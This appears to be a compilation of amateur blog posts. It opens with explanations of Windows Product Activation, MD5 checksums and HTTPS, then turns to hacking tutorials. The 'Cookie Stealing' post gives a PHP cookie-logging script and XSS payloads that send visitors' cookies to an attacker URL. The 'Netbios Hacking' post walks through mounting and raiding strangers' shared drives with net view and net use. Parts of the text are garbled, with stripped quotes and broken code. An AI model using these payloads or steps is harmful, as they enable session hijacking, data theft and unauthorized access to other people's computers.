Working of a WPA

How Windows Product Activation (WPA) Works?

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well. WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.

In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.

1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.

2. Hardware ID – This value is derived based on the hardware configuration of your computer.

The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

• Display Adapter
• SCSI Adapter
• IDE Adapter (effectively the motherboard)
• Network Adapter (NIC) and its MAC Address
• RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
• Processor Type
• Processor Serial Number
• Hard Drive Device
• Hard Drive Volume Serial Number (VSN)
• CD-ROM / CD-RW / DVD-ROM

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.

The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.

However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:

During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.

Thus for a successful activation, either of the following two cases must be satisfied:

1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.
2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What if I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

• WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
• If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
• WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
• WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.

I have tried my best to uncover the secret behind the WPA. For further details and more technical information you can read the actual paper by Fully Licensed GmbH at http://www.licenturion.com/xp/fully-licensed-wpa.txt. I hope you like this post. Pass your comments.

Wanna go Encryting.... Read dis article

What is MD5 Hash and How to Use it?

In this post I will explain you about one of my favorite and interesting cryptographic algorithm called MD5 (Message-Digest algorithm 5). This algorithm is mainly used to perform file integrity checks under most circumstances. Here I will not jump into the technical aspects of this algorithm, rather will tell you about how to make use of this algorithm in your daily life. Before I tell you about how to use MD5, I would like to share one of my recent experience which made me start using MD5 algorithm.

Recently I made some significant changes and updates to my website and as obvious I generated a complete backup of the site on my server. I downloaded this backup onto my PC and deleted the original one on the server. But after a few days something went wrong and I wanted to restore the backup that I downloaded. When I tried to restore the backup I was shocked! The backup file that I used to restore was corrupted. That means, the backup file that I downloaded onto my PC wasn’t exactly the one that was on my server. The reason is that there occured some data loss during the download process. Yes, this data loss can happen often when a file is downloaded from the Internet. The file can be corrupted due to any of the following reasons.

• Data loss during the download process, due to instability in the Internet connection/server
• The file can be tampered due to virus infections or
• Due to Hacker attacks

So whenever you download any valuable data from the Internet it is completely necessary that you check the integrity of the downloaded file. That is you need to ensure that the downloaded file is exactly the same as that of the original one. In this scenario the MD5 hash can become handy. All you have to do is generate MD5 hash (or MD5 check-sum) for the intended file on your server. After you download the file onto your PC, again generate MD5 hash for the downloaded file. Compare these two hashes and if it matches then it means that the file is downloaded perfectly without any data loss.

A MD5 hash is nothing but a 32 digit hexadicimal number which can be something as follows

A Sample MD5 Hash

e4d909c290d0fb1ca068ffaddf22cbd0

This hash is unique for every file irrespective of it’s size and type. That means two .exe files with the same size will not have the same MD5 hash even though they are of same type and size. So MD5 hash can be used to uniquely identify a file. 

How to use MD5 Hash to check the Integrity of Files?

Suppose you have a file called backup.tar on your server. Before you download, you need to generate MD5 hash for this file on your server. To do so use the following command.

For UNIX:

md5sum backup.tar

When you hit ENTER you’ll see something as follows

e4d909c290d0fb1ca068ffaddf22cbd0

This is the MD5 hash for the file backup.tar. After you download this file onto your PC, you can cross check it’s integrity by again re-generating MD5 hash for the downloaded file. If both the hash matches then it means that the file is perfect. Otherwise it means that the file is corrupt. To generate the MD5 hash for the downloaded file on your Windows PC use the following freeware tool

MD5 Summer (Click on the link to download)

I hope you like this post. For further doubts and clarifications please pass your comments. Cheers!

Browse FB with https for high security

Know More About Secure Sockets Layer (SSL)

Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.

What exactly is Secure Communication ?

Suppose there exists two communication parties A (client) and B (server).

Working of HTTP

When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between Aand B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure

Now lets see the working of HTTPS

When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below

How is HTTPS implemented ?

HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses

1. An SSL Certificate enables encryption of sensitive information during online transactions.
2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
3. A Certificate Authority verifies the identity of the certificate owner when it is issued.

How Encryption Works ?

Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).

How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon  in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.

In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.

So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.

I Hope this helps. Please pass your comments.

Cookie Stealing......

Cookie Stealing for Stored Passwords

Cookie Stealing is one of the most fundamental aspects of XSS (cross site
scripting).
Why is the cookie so important? Well, first you should see exactly what sort of
information is stored in a cookie. Go to a website that requires a login, and
after logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)

After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. Here's an example of what might be in your cookie: 

Code:
username=CyberPhreak; password=ilikepie

This is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people s cookies, every user account is possibly compromised. You ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes
just knowing the hash is enough. Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users cookies?

This is

the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I ll show you an example of a pHp script that accepts cookies:

Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );

fwrite($log, $cookie . \n );

fclose($log);
?>

And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case cookie in the URL, and then saves it to a file called log.txt . For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site.This is the second and harder part of the cookiestealer. Most websites apply some sort of filter to input, so that you can t directly

insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it s not easy, but it can be very simple. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a member profile , etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to
cookiestealing. 

Let's assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let s also assume that this website doesn't have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I ll give you an example of some code that we could put into a guestbook post that would send the

user's cookie to out script: 

 

Code:

<script>

document.location = http://yoursite.com/steal.php?cookie= + document.cookie;

</script>

Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you d see the cookies of whoever looked at that page. But cookiestealing is never that easy. Let s assume now that the administrator of 

this site got smart, and decided to filter out script tags. Now you code doesn t work, so we have to try and evade the filter. In this instance, it s easy enough:

Code:

<a href= jvoid(document.location= http://yoursite.com/steal.php?cookie= +document.cookie) >Click Me</a>

 

In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.

HOPE YOU LIKE MY POST....
Pass your Comments

Hacking a remote computer from ur PC

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1: 
C:\>net use D: \\219.64.55.112\F
Example-2: 
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3: 
C:\>net use I: \\219.64.55.112\Myprint

 NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.

HAPPY NETBIOS HACKING!!